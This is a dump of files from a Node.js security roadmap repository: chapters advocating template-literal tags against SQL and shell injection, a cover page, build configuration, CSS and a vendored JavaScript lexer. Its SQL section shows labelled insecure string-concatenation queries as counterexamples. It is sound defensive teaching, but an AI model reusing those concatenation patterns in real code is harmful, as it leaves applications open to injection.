these factors will cause developers who have been through 131 | such a migration to continue to use it in subsequent projects where it 132 | may spread to other developers. 133 | 134 | 135 | ```js 136 | // Proposed: Secure, tolerant, composes well.
137 | connection.query`SELECT * FROM T WHERE x=${x}`(callback) 138 | connection.query`SELECT * FROM T WHERE x="${x}"`(callback) 139 | 140 | // String concatenation. Insecure, composes well. 141 | connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback) 142 | connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback) 143 | 144 | // String concatenation is not tolerant. 145 | // Broken in a way that will be caught during casual testing. 146 | connection.query('SELECT * FROM T WHERE x = ' + x, callback) 147 | connection.query(`SELECT * FROM T WHERE x = ${x}`, callback) 148 | 149 | // Prepared Statements. Secure, composes badly, positional parameters. 150 | connection.query('SELECT * FROM T WHERE x = ?', x, callback) 151 | connection.query('SELECT * FROM T WHERE x = "?"', x, callback) // Subtly broken 152 | ``` 153 | 154 | 155 | 156 | [`mysql`]: https://www.npmjs.com/package/mysql 157 | [QUI]: ../chapter-1/threat-QUI.md 158 | [prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29 159 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals 160 | [sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql 161 | [mysql-PR]: https://github.com/mysqljs/mysql/pull/1926 162 | -------------------------------------------------------------------------------- /chapter-7/structured-strings.md: -------------------------------------------------------------------------------- 1 | # Structured Strings 2 | 3 | Both of the previously discussed problems, query injection and shell 4 | injection, are facets of a common problem: it is hard to securely 5 | compose strings to send outside the process. In the first case, 6 | we send a query string to a database via a file descriptor bound to a 7 | network socket or an IPC endpoint. 
In the second, we send a string 8 | via a syscall wrapper, to spawn a child process. 9 | 10 | ## Success Criteria 11 | 12 | We can securely compose strings for external endpoints if: 13 | 14 | * Developers routinely use tools to produce structured strings 15 | that preserve developers' intent even in the face of inputs 16 | crafted by a skilled attacker, and/or 17 | * Where developers do not, the backends grant no authority based on 18 | the structure of the string, and the authority granted ambiently is 19 | so small as to not be abusable. 20 | 21 | Nailing down the definition of *intent* is hard, but here's an example 22 | of how we can in one context. Consider 23 | 24 | ```js 25 | "SELECT * FROM T WHERE id=" + f(accountNumber) 26 | ``` 27 | 28 | A reasonable reader would conclude that the author intended: 29 | 30 | * That the result specifies one statement, a select statement. 31 | * That `f(accountNumber)` specifies only a simple value that 32 | can be compared to values in the *id* column. 33 | 34 | Given that, we can say `function f(x)` preserves intent in that code 35 | if, for any value of `accountNumber`, it throws an exception or 36 | its output following "`SELECT * FROM T WHERE id=`" parses as a 37 | single number or string literal token. 38 | 39 | 40 | 41 | ## A possible solution 42 | 43 | ### Change the world so we can give simple answers to hard questions. 44 | 45 | Extend existing APIs so that whenever a developer is composing a 46 | string to send outside the `node` process, they have a template 47 | literal tag based API that is more secure than string concatenation. 48 | 49 | Then, we can give developers a simple piece of advice: 50 | 51 | > If you're composing a string that will end up outside node, use 52 | > a template tag. 53 | 54 | Template tags will have implementation bugs, but fixing one template 55 | tag is easier than fixing many expressions of the form 56 | `("foo " + bar + " baz")`. 
57 | 58 | 59 | ### A common style guide for tag implementers. 60 | 61 | It would help developers if these template literal tags had some 62 | consistency across libraries. We've already briefly discussed ways to 63 | make template tags more discoverable and usable when talking about 64 | ways to treat [generated code][synthetic modules] as first class. 65 | 66 | We propose a style guide for tag authors. 67 | Others will probably have better ideas as to what it should contain, but 68 | to get a discussion started: 69 | 70 | - Functions that compose or represent a string whose recipient is outside 71 | the node runtime should accept template tags. 72 | Examples include `mysql.format` which composes a string of SQL. 73 | - These functions should return a typed string wrapper. 74 | For example, if the output is a string of *SQL* tokens, 75 | then return an instance of: 76 | ```js 77 | function SqlFragment(s) { 78 | if (!(this instanceof SqlFragment)) { return new SqlFragment(s); } 79 | this.content = String(s); 80 | } 81 | SqlFragment.prototype.toString = function () { return this.content; }; 82 | ``` 83 | Don't re-escape `SqlFragment`s received as interpolation values 84 | where they make sense. 85 | - See if you can reuse string wrappers from a library before rolling 86 | your own to encourage interoperability. 87 | If a library defines a type representing a fragment of HTML, use that 88 | as long as your operator can uphold the type's contract. 89 | For example if the type has a particular [security contract][], 90 | make sure that you preserve that security contract. 91 | You may assume that wrapped strings come from a source that upheld 92 | the contract. 93 | Producing a value that doesn't uphold its contract when your inputs do 94 | is a bug, but assuming incorrectly that type contracts hold for your 95 | inputs is not. 96 | If you can double check inputs, great!
97 | - The canonical way to test whether a function was (very probably) 98 | called as a template tag is 99 | ```js 100 | function (a, ...b) { 101 | if (Array.isArray(a) && Array.isArray(a.raw) 102 | && Object.isFrozen(a) 103 | && a.length === b.length + 1) { 104 | // Treat as template tag. 105 | } 106 | // Handle non template tag use. 107 | } 108 | ``` 109 | - When a template tag takes options objects, it should 110 | be possible to curry those before invoking the function as a tag. 111 | The following passes some environment variables and a working directory 112 | before the command: 113 | ```js 114 | shelljs.exec({ env: ..., cwd: ... })`cat ...` 115 | ``` 116 | - When a template tag takes a `callback`, the template tag should 117 | return a function that will receive the callback. 118 | The following uses a template tag that returns a function that 119 | takes a callback: 120 | ```js 121 | myConnection.query`SELECT ...`(callback) 122 | ``` 123 | - Where possible, allow indenting multi-line template tags. 124 | Use the first line with non-whitespace characters as a cue 125 | when stripping whitespace from the rest of the lines. 126 | 127 | ## Alternatives 128 | 129 | Database abstractions like object-relational mappings are a great way 130 | to get developers out of the messy business of composing queries. 131 | 132 | There are still niche use cases like ad-hoc reporting that require 133 | composing queries, and solving the problem for database queries does 134 | not solve it for strings sent elsewhere, e.g. shells. 135 | 136 | Builder APIs provide a flexible way to compose structured content. 137 | For example, 138 | 139 | ```java 140 | new QueryBuilder() 141 | .select() 142 | .innerJoin(...).on(...) 143 | .columns(...) 144 | .where(...) 145 | .orderBy(...) 
146 | .build() 147 | ``` 148 | 149 | The explicit method calls specify the structure of the resulting 150 | string, so controlling parameters doesn't grant control of sentence 151 | structure, and control of one parameter doesn't allow reinterpreting 152 | part of the query specified by an uncontrolled parameter. 153 | 154 | In JavaScript we prefer tagged templates to builders. Builder APIs can 155 | be syntactically heavy and developers have to discover and learn them. 156 | We hope that adoption of template tags will be easier because: 157 | 158 | * Tagged templates are syntactically lighter so easier to write. 159 | * Someone unfamiliar with the API, but familiar with the query language, will 160 | have to do less work to leverage the one to understand the other making 161 | tagged templates easier to read and adapt for one's own work. 162 | * Builder APIs have to treat nested sub-languages (e.g. URLs in HTML) 163 | as strings unless there is a builder API for the sub-language. 164 | 165 | 166 | [security contract]: https://github.com/google/safe-html-types 167 | [synthetic modules]: ../chapter-2/synthetic-modules.html 168 | -------------------------------------------------------------------------------- /cover.md: -------------------------------------------------------------------------------- 1 | # A Roadmap for Node.js Security 2 | 3 | Node.js has a vibrant community of application developers and library 4 | authors built around a mature and well-maintained core runtime and 5 | library set. Its growing popularity is already drawing more attention 6 | from attackers. This roadmap discusses how some Node.js projects 7 | address security challenges, along with ways to make it easier 8 | for more projects to address these challenges in a thorough and 9 | consistent manner. 10 | 11 | This is not the opinion of any organization.
It is the considered 12 | opinion of 13 | [some computer security professionals and Node.js enthusiasts][contributors] 14 | who have worked to make it easier to write secure, robust software on 15 | other platforms; who like a lot about Node.js; and who would like to 16 | help make it better. 17 | 18 | Our intended audience is Node.js library and infrastructure 19 | maintainers who want to stay ahead of the increased scrutiny that 20 | Node.js is getting from attackers. We have not researched whether, 21 | and do not assert that, any stack is inherently more or less secure 22 | than any other. 23 | 24 | Node.js security is especially important for “primary targets”. 25 | Targets are often subdivided into "primary targets" and "targets of 26 | opportunity." One attacks the latter if one happens to see a 27 | vulnerability. One goes out of their way to find vulnerabilities in 28 | the former. The practices which prevent one from becoming a target of 29 | opportunity might not be enough if one is a primary target of an actor 30 | with resources at their disposal. We hope that the ideas we present 31 | might help primary targets to defeat attacks while making targets of 32 | opportunity rarer and the entire ecosystem more secure. 33 | 34 | When addressing threats, we want to make sure we preserve Node.js's 35 | strengths. 36 | 37 | * Development teams can iterate quickly allowing them to explore a 38 | large portion of the design space. 39 | * Developers can use a wealth of publicly available packages to solve 40 | everyday problems. 41 | * Anyone who identifies a shared problem can write and publish a 42 | module to solve it, or send a pull request with a fix or extension 43 | to an existing project. 44 | * Node.js integrates with a wide variety of application containers so 45 | project teams have options when deciding how to deploy. 46 | * Using JavaScript on the front and back ends of Web applications 47 | allows developers to work both sides when need be. 
48 | 49 | The individual chapters are largely independent of one another: 50 | 51 | "[Threat environment][]" discusses the kinds of threats that concern us. 52 | 53 | "[Dynamism when you need it][]" discusses how to preserve the power of 54 | CommonJS module linking, `vm` contexts, and runtime code generation 55 | while making sure that, in production, only code that the development 56 | team trusts gets run. 57 | 58 | "[Knowing your dependencies][]" discusses ways to help development 59 | teams make informed decisions about third-party dependencies. 60 | 61 | "[Keeping your dependencies close][]" discusses how keeping a local 62 | replica of portions of the larger npm repository affects security and 63 | aids incident response. 64 | 65 | "[Oversight][]" discusses how code-quality tools can help decouple 66 | security review from development. 67 | 68 | "[When all else fails][]" discusses how the development → 69 | production pipeline and development practices can affect the ability 70 | of security professionals to identify and respond to imminent threats. 71 | 72 | "[Library support for safe coding practices][]" discusses idioms 73 | that, if more widespread, might make it easier for developers to 74 | produce secure, robust systems. 75 | 76 | You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*. 
77 | 78 | [contributors]: CONTRIBUTORS.md 79 | [Threat environment]: chapter-1/threats.md 80 | [Dynamism when you need it]: chapter-2/dynamism.md 81 | [Knowing your dependencies]: chapter-3/knowing_dependencies.md 82 | [Keeping your dependencies close]: chapter-4/close_dependencies.md 83 | [Oversight]: chapter-5/oversight.md 84 | [When all else fails]: chapter-6/failing.md 85 | [Library support for safe coding practices]: chapter-7/libraries.md 86 | [github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/ 87 | -------------------------------------------------------------------------------- /images/FileExternal.svg: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 9 | 10 | -------------------------------------------------------------------------------- /images/GitHub-Mark-32px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/GitHub-Mark-32px.png -------------------------------------------------------------------------------- /images/ic_print_24dp.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /images/npmjs-node.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/npmjs-node.png -------------------------------------------------------------------------------- /license.md: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | Creative Commons License
A Roadmap for Node.js Security by https://github.com/google/node-sec-roadmap/ is licensed under a Creative Commons Attribution 4.0 International License. 6 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "1.0.0", 3 | "name": "@mikesamuel/nodejs_sec_book", 4 | "description": "Booklet about NodeJS in organizations with large security profiles", 5 | "homepage": "https://github.com/google/node-sec-roadmap/", 6 | "license": "(Apache License 2.0 OR CC-BY-4.0)", 7 | "author": { 8 | "name": "Mike Samuel", 9 | "email": "mikesamuel@gmail.com", 10 | "url": "https://github.com/mikesamuel" 11 | }, 12 | "files": [ 13 | "www/**" 14 | ], 15 | "main": "www/index.html", 16 | "dependencies": { 17 | "gitbook": ">=3.2.3", 18 | "gitbook-cli": ">=2.3.2", 19 | "gitbook-plugin-ga": "^1.0.1", 20 | "gitbook-plugin-links": "^3.0.1", 21 | "svgexport": "^0.3.2" 22 | }, 23 | "private": true, 24 | "scripts": { 25 | "start": "make serve" 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /styles/website.css: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 
16 | */ 17 | 18 | .print-button.btn.links-link { 19 | display: inline-block; 20 | width: 30px; 21 | font-size: 0; 22 | background-image: url("/images/ic_print_24dp.svg"); 23 | background-repeat: no-repeat; 24 | background-position: center center; 25 | } 26 | 27 | .github-button.btn.links-link { 28 | display: inline-block; 29 | width: 30px; 30 | font-size: 0; 31 | background-image: url("/images/GitHub-Mark-32px.png"); 32 | background-repeat: no-repeat; 33 | background-position: center center; 34 | background-size: 20px; 35 | opacity: 0.25; 36 | } 37 | 38 | /* Style external links */ 39 | a[href^="http://"]:not([href^="http://www.gitbook.com"]), 40 | a[href^="https://"]:not([href^="https://www.gitbook.com"]), 41 | a[href^="//"]:not([href^="//www.gitbook.com"]) { 42 | background-image: url("/images/FileExternal.svg"); 43 | background-position: center right; 44 | background-repeat: no-repeat; 45 | background-size: 12px 12px; 46 | padding-right: 14px; 47 | } 48 | -------------------------------------------------------------------------------- /third_party/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright 2017 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 
14 | -------------------------------------------------------------------------------- /third_party/jslex/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright 2017 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | -------------------------------------------------------------------------------- /third_party/jslex/jslex.py: -------------------------------------------------------------------------------- 1 | # Copyright 2011-2015 Ned Batchelder. All rights reserved. 2 | # 3 | # Except where noted otherwise, this software is licensed under the Apache 4 | # License, Version 2.0 (the "License"); you may not use this work except in 5 | # compliance with the License. You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 
14 | 15 | # From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py 16 | # For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt 17 | 18 | 19 | """JsLex: a lexer for Javascript""" 20 | 21 | import re 22 | 23 | class Tok(object): 24 | """A specification for a token class.""" 25 | 26 | num = 0 27 | 28 | def __init__(self, name, regex, next=None): 29 | self.id = Tok.num 30 | Tok.num += 1 31 | self.name = name 32 | self.regex = regex 33 | self.next = next 34 | 35 | def literals(choices, prefix="", suffix=""): 36 | """Create a regex from a space-separated list of literal `choices`. 37 | 38 | If provided, `prefix` and `suffix` will be attached to each choice 39 | individually. 40 | 41 | """ 42 | return "|".join(prefix+re.escape(c)+suffix for c in choices.split()) 43 | 44 | class Lexer(object): 45 | """A generic multi-state regex-based lexer.""" 46 | 47 | def __init__(self, states, first): 48 | self.regexes = {} 49 | self.toks = {} 50 | 51 | for state, rules in states.items(): 52 | parts = [] 53 | for tok in rules: 54 | groupid = "t%d" % tok.id 55 | self.toks[groupid] = tok 56 | parts.append("(?P<%s>%s)" % (groupid, tok.regex)) 57 | self.regexes[state] = re.compile("|".join(parts), re.MULTILINE|re.VERBOSE) 58 | 59 | self.state = first 60 | 61 | def lex(self, text): 62 | """Lexically analyze `text`. 63 | 64 | Yields pairs (`name`, `tokentext`). 
65 | 66 | """ 67 | end = len(text) 68 | state = self.state 69 | regexes = self.regexes 70 | toks = self.toks 71 | start = 0 72 | 73 | while start < end: 74 | for match in regexes[state].finditer(text, start): 75 | name = match.lastgroup 76 | tok = toks[name] 77 | toktext = match.group(name) 78 | start += len(toktext) 79 | yield (tok.name, toktext) 80 | 81 | if tok.next: 82 | state = tok.next 83 | break 84 | 85 | self.state = state 86 | 87 | 88 | class JsLexer(Lexer): 89 | """A Javascript lexer 90 | 91 | >>> lexer = JsLexer() 92 | >>> list(lexer.lex("a = 1")) 93 | [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')] 94 | 95 | This doesn't properly handle non-Ascii characters in the Javascript source. 96 | 97 | """ 98 | 99 | # Because these tokens are matched as alternatives in a regex, longer possibilities 100 | # must appear in the list before shorter ones, for example, '>>' before '>'. 101 | # 102 | # Note that we don't have to detect malformed Javascript, only properly lex 103 | # correct Javascript, so much of this is simplified. 
104 | 105 | # Details of Javascript lexical structure are taken from 106 | # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf 107 | 108 | # A useful explanation of automatic semicolon insertion is at 109 | # http://inimino.org/~inimino/blog/javascript_semicolons 110 | 111 | both_before = [ 112 | Tok("comment", r"/\*(.|\n)*?\*/"), 113 | Tok("linecomment", r"//.*?$"), 114 | Tok("ws", r"\s+"), 115 | Tok("keyword", literals(""" 116 | break case catch class const continue debugger 117 | default delete do else enum export extends 118 | finally for function if import in instanceof new 119 | return super switch this throw try typeof var 120 | void while with 121 | """, suffix=r"\b"), next='reg'), 122 | Tok("reserved", literals("null true false", suffix=r"\b"), next='div'), 123 | Tok("id", r""" 124 | ([a-zA-Z_$ ]|\\u[0-9a-fA-Z]{4}) # first char 125 | ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})* # rest chars 126 | """, next='div'), 127 | Tok("hnum", r"0[xX][0-9a-fA-F]+", next='div'), 128 | Tok("onum", r"0[0-7]+"), 129 | Tok("dnum", r""" 130 | ( (0|[1-9][0-9]*) # DecimalIntegerLiteral 131 | \. # dot 132 | [0-9]* # DecimalDigits-opt 133 | ([eE][-+]?[0-9]+)? # ExponentPart-opt 134 | | 135 | \. # dot 136 | [0-9]+ # DecimalDigits 137 | ([eE][-+]?[0-9]+)? # ExponentPart-opt 138 | | 139 | (0|[1-9][0-9]*) # DecimalIntegerLiteral 140 | ([eE][-+]?[0-9]+)? # ExponentPart-opt 141 | ) 142 | """, next='div'), 143 | Tok("punct", literals(""" 144 | >>>= === !== >>> <<= >>= <= >= == != << >> && 145 | || += -= *= %= &= |= ^= 146 | """), next="reg"), 147 | Tok("punct", literals("++ -- ) ]"), next='div'), 148 | Tok("punct", literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? 
: ="), next='reg'), 149 | Tok("string", r'"([^"\\]|(\\(.|\n)))*?"', next='div'), 150 | Tok("string", r"'([^'\\]|(\\(.|\n)))*?'", next='div'), 151 | ] 152 | 153 | both_after = [ 154 | Tok("other", r"."), 155 | ] 156 | 157 | states = { 158 | 'div': # slash will mean division 159 | both_before + [ 160 | Tok("punct", literals("/= /"), next='reg'), 161 | ] + both_after, 162 | 163 | 'reg': # slash will mean regex 164 | both_before + [ 165 | Tok("regex", 166 | r""" 167 | / # opening slash 168 | # First character is.. 169 | ( [^*\\/[] # anything but * \ / or [ 170 | | \\. # or an escape sequence 171 | | \[ # or a class, which has 172 | ( [^\]\\] # anything but \ or ] 173 | | \\. # or an escape sequence 174 | )* # many times 175 | \] 176 | ) 177 | # Following characters are same, except for excluding a star 178 | ( [^\\/[] # anything but \ / or [ 179 | | \\. # or an escape sequence 180 | | \[ # or a class, which has 181 | ( [^\]\\] # anything but \ or ] 182 | | \\. # or an escape sequence 183 | )* # many times 184 | \] 185 | )* # many times 186 | / # closing slash 187 | [a-zA-Z0-9]* # trailing flags 188 | """, next='div'), 189 | ] + both_after, 190 | } 191 | 192 | def __init__(self): 193 | super(JsLexer, self).__init__(self.states, 'reg') 194 | 195 | 196 | def js_to_c_for_gettext(js): 197 | """Convert the Javascript source `js` into something resembling C for xgettext. 198 | 199 | What actually happens is that all the regex literals are replaced with 200 | "REGEX". 201 | 202 | """ 203 | def escape_quotes(m): 204 | """Used in a regex to properly escape double quotes.""" 205 | s = m.group(0) 206 | if s == '"': 207 | return r'\"' 208 | else: 209 | return s 210 | 211 | lexer = JsLexer() 212 | c = [] 213 | for name, tok in lexer.lex(js): 214 | if name == 'regex': 215 | # C doesn't grok regexes, and they aren't needed for gettext, 216 | # so just output a string instead. 
217 | tok = '"REGEX"' 218 | elif name == 'string': 219 | # C doesn't have single-quoted strings, so make all strings 220 | # double-quoted. 221 | if tok.startswith("'"): 222 | guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1]) 223 | tok = '"' + guts + '"' 224 | elif name == 'id': 225 | # C can't deal with Unicode escapes in identifiers. We don't 226 | # need them for gettext anyway, so replace them with something 227 | # innocuous 228 | tok = tok.replace("\\", "U") 229 | c.append(tok) 230 | return ''.join(c) 231 | --------------------------------------------------------------------------------